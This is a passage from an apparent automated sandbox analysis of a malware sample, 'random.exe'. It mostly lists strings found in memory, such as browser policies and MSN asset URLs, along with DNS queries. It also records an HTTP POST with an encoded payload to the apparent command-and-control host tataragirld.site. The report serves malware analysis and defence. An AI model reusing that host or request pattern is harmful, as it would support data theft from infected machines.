tURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}]},"media_foundation_override":{"version":1,"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"applications":[{"domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"],"applied_policy":"OptIn"}]},"web_notification_override":{"applications":[{"applied_policy":"Prompt","domain":"www.reddit.com"},{"applied_policy":"Prompt","domain":"www.telegraphindia.com"},{"applied_policy":"Prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"Prompt","domain":"pushengage.com"},{"applied_policy":"Prompt","domain":"www.timesnownews.com"},{"applied_polic equals www.yahoo.com (Yahoo)
Source: random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"OptOut"},{"domain":"outbrainimg.com","applied_policy":"OptOut"},{"domain":"pexels.com","applied_policy":"OptOut"},{"domain":"search.naver.com","applied_policy":"OptOut"},{"domain":"search.yahoo.com","applied_policy":"OptOut"},{"domain":"sharepoint.com","applied_policy":"OptOut"},{"domain":"skovik.com","applied_policy":"OptOut"},{"domain":"staging-bing-int.*","applied_policy":"OptOut"},{"domain":"storage.live.com","applied_policy":"OptOut"},{"domain":"svc.ms","applied_policy":"OptOut"},{"domain":"sygic.*","applied_policy":"OptOut"},{"domain":"techcommunity.microsoft.com","applied_policy":"OptOut"},{"domain":"tiktok.com","applied_policy":"OptOut"},{"domain":"twitter.com","applied_policy":"OptOut"},{"domain":"web.whatsapp.com","applied_policy":"OptOut"},{"domain":"yammer.com","applied_policy":"OptOut"},{"domain":"youtube.com","applied_policy":"OptOut"},{"domain":"content.lego.com","applied_policy":"OptOut"},{"domain":"partner.lego.com","applied_policy":"OptOut"},{"domain":"shop.b2b.lego.com","applied_policy":"OptOut"},{"domain":"showroom.lego.com","applied_policy":"OptOut"},{"domain":"legacyhealth.org","applied_policy":"OptOut"}]},"content_filter_on_off_switch":{"version":1,"policies":[{"name":"ContentFilter"}],"applications":[{"domain":"microsoft.com","applied_policy":"ContentFilter"}]},"ecp_override":{"version":1,"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}]},"media_foundation_override":{"version":1,"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"applications":[{"domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"],"applied_policy":"OptIn"}]},"web_notification_override":{"applications":[{"applied_policy":"Prompt","domain":"www.reddit.com"},{"applied_policy":"Prompt","domain":"www.telegraphindia.com"},{"applied_policy":"Prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"Prompt","domain":"pushengage.com"},{"applied_policy":"Prompt","domain":"www.timesnownews.com"},{"applied_polic equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @rc 'nonce-rXJis52YQNI9dkskYZoicB6XVRYK7pXoOtnpKy7g2pE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: @www.youtube.com equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Lvwww.youtube.com equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: XJis52YQNI9dkskYZoicB6XVRYK7pXoOtnpKy7g2pE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: XJis52YQNI9dkskYZoicB6XVRYK7pXoOtnpKy7g2pE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/,"vened":false}g equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.facebook.com (Facebook)
Source: random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.facebook.com (Facebook)
Source: random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rc 'nonce-rXJis52YQNI9dkskYZoicB6XVRYK7pXoOtnpKy7g2pE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rc 'nonce-rXJis52YQNI9dkskYZoicB6XVRYK7pXoOtnpKy7g2pE=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:_ equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2205678914.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2205678914.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: tataragirld.site
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownHTTP traffic detected: POST /sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15Content-Length: 147Host: tataragirld.site
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: random.exe, 00000000.00000003.2301128582.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168968504.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206755988.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: random.exe, 00000000.00000003.2301128582.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168968504.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206755988.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: random.exe, 00000000.00000003.2254806673.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2189906585.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257548362.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240216428.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2301004825.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241455616.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.i.lencr.org/0A
Source: random.exe, 00000000.00000003.2254806673.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2189906585.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257548362.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240216428.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2301004825.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241455616.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e5.o.lencr.org0
Source: random.exe, 00000000.00000003.2301128582.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168968504.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206755988.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2258616094.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: random.exe, 00000000.00000003.2182899619.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: random.exe, 00000000.00000003.2182899619.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347192499.000001D2EAA2D000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alearth/Locm/REST/vcatift.com
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alekberg.net/privacy
Source: random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.cn/auth/cookie/silentpassport
Source: random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/auth/cookie/silentpassport
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=035D89D9
Source: random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com%22
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/SignInData.738774a1565695022644.js
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/SignInData.738774a1565695022644.js1876.js
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/background-gallery.078daa21cfb37d404ae1.js
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/background-gallery.078daa21cfb37d404ae1.js55.j
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/background-gallery.078daa21cfb37d404ae1.js_
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-store.951d14e3cfc7dc4b379a.js
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-cscore.15f69ab6d77b11c23a41.js
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-feed-libs.ff0b115aac18a3a45015.js
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-feed-libs.ff0b115aac18a3a45015.jsL_
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-segments.d3a1e6fd6faf8c83406c.js
Source: random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-settings-edgenext.2aca53164d1cd4b72160.
Source: random.exe, 00000000.00000003.2205678914.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-sports-lib.9d4c3e54e757bf300f31.js
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common-sports-lib.9d4c3e54e757bf300f31.js_
Source: random.exe, 00000000.00000003.2149103706.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.2ab67b7067792da4ff61.js
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/diagnostic-web-vitals.95b1542329807b1f42ef.js
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/diagnostic-web-vitals.95b1542329807b1f42ef.js#
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/digest-card.aa9d0bf4adccd1526ebe.js
Source: random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.6f0a7a8cb15b3adbab23.js
Source: random.exe, 00000000.00000003.2188643666.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_top-sites-edgenext-wc_dist_TopSite
Source: random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js
